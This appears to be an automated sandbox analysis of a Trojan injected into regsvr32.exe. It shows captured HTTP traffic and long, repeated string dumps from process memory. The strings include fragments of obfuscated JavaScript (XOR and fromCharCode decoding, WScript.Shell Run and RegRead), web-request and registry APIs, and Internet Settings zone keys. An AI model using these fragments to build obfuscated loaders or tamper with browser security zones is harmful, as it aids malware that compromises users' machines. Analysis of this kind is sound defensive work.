HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.microsoft.com/
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Mon, 27 Jun 2016 23:01:23 GMT
Content-Length: 148
<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://VVV.microsoft.com/">here</a></body>HTTP/1.1 301 Moved Permanently..Content-Type: text/html; charset=UTF-8..Location: hXXp://VVV.microsoft.com/..Server: Microsoft-IIS/8.5..X-Powered-By: ASP.NET..Date: Mon, 27 Jun 2016 23:01:23 GMT..Content-Length: 148..<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://VVV.microsoft.com/">here</a></body>..
GET /download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.microsoft.com
Cache-Control: no-cache
Cookie: MS-CV=ahvTkOAUdk6BlrWx.2
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 09 Oct 2009 23:52:17 GMT
Accept-Ranges: bytes
ETag: "6d3979883b49ca1:0"
Server: Microsoft-IIS/8.5
Content-Disposition: attachment
Content-Length: 6156064
Date: Mon, 27 Jun 2016 23:01:37 GMT
Connection: keep-alive
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
regsvr32.exe_324:
.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
USER32.DLL
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowserApp
IWebBrowser2
.length;
=String.fromCharCode(parseInt(
.substr(
,2),16));
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
12_12_12
psapi.dll
HTTP/1.1
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
Mozilla
?456789:;
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
@.reloc
222.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyA
version.dll
gdi32.dll
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
ole32.dll
wsock32.dll
winmm.dll
atl.dll
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
shell32.dll
ShellExecuteExW
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
4"4,414?4
4,41494^4
6%6X6v6
0%0-0e0m0u0}0
6v7U7\7j7
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
regsvr32.exe_324_rwx_00080000_0013E000:
.idata
.idata
.reloc
.reloc
P.rsrc
P.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
USER32.DLL
USER32.DLL
wininet.dll
wininet.dll
user32.dll
user32.dll
ntdll.dll
ntdll.dll
Kernel32.dll
Kernel32.dll
URLMON.DLL
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
PSAPI.dll
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowser
IWebBrowserApp
IWebBrowserApp
IWebBrowser2
IWebBrowser2
.length;
.length;
=String.fromCharCode(parseInt(
=String.fromCharCode(parseInt(
.substr(
.substr(
,2),16));
,2),16));
=String.fromCharCode(
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt()^
,1).charCodeAt());
,1).charCodeAt());
.length-1)?
.length-1)?
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Environment("Process"))("
.Run("
.Run("
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.RegRead("
.RegRead("
12_12_12
12_12_12
psapi.dll
psapi.dll
HTTP/1.1
HTTP/1.1
\\.\LCD
\\.\LCD
1234567890
1234567890
Shell32.dll
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
0123456789
Mozilla
Mozilla
.text
.text
`.rdata
`.rdata
@.pdata
@.pdata
KERNEL32.dll
KERNEL32.dll
@.reloc
@.reloc
222.dll
222.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
oleaut32.dll
oleaut32.dll
RegOpenKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyW
RegCreateKeyA
RegCreateKeyA
version.dll
version.dll
gdi32.dll
gdi32.dll
SetProcessWindowStation
SetProcessWindowStation
OpenWindowStationA
OpenWindowStationA
EnumChildWindows
EnumChildWindows
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
FindCloseUrlCache
DeleteUrlCacheEntry
DeleteUrlCacheEntry
ole32.dll
ole32.dll
wsock32.dll
wsock32.dll
winmm.dll
winmm.dll
atl.dll
atl.dll
wtsapi32.dll
wtsapi32.dll
Wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
PSAPI.DLL
shell32.dll
shell32.dll
ShellExecuteExW
ShellExecuteExW
NtQueryValueKey
NtQueryValueKey
NtDeleteValueKey
NtDeleteValueKey
NtSetValueKey
NtSetValueKey
urlmon.dll
urlmon.dll
UrlMkSetSessionOption
UrlMkSetSessionOption
UhcMD
UhcMD
WindowsUpdate
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
66006666
- cmdline args path>path inj_ffile>inj_ffile
- cmdline args path>path inj_ffile>inj_ffile
regsvr32.exe_2024:
.idata
.idata
.reloc
.reloc
P.rsrc
P.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
USER32.DLL
USER32.DLL
wininet.dll
wininet.dll
user32.dll
user32.dll
ntdll.dll
ntdll.dll
Kernel32.dll
Kernel32.dll
URLMON.DLL
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
PSAPI.dll
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowserApp
IWebBrowser2
.length;
=String.fromCharCode(parseInt(
.substr(
,2),16));
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
12_12_12
psapi.dll
HTTP/1.1
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
Mozilla
?456789:;
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
@.reloc
222.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyA
version.dll
gdi32.dll
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
ole32.dll
wsock32.dll
winmm.dll
atl.dll
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
shell32.dll
ShellExecuteExW
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
regsvr32.exe_2024_rwx_00080000_0013E000:
.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
USER32.DLL
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowserApp
IWebBrowser2
.length;
=String.fromCharCode(parseInt(
.substr(
,2),16));
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
12_12_12
psapi.dll
HTTP/1.1
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
Mozilla
?456789:;
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
@.reloc
222.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyA
version.dll
gdi32.dll
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
ole32.dll
wsock32.dll
winmm.dll
atl.dll
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
shell32.dll
ShellExecuteExW
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
UhcMD
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666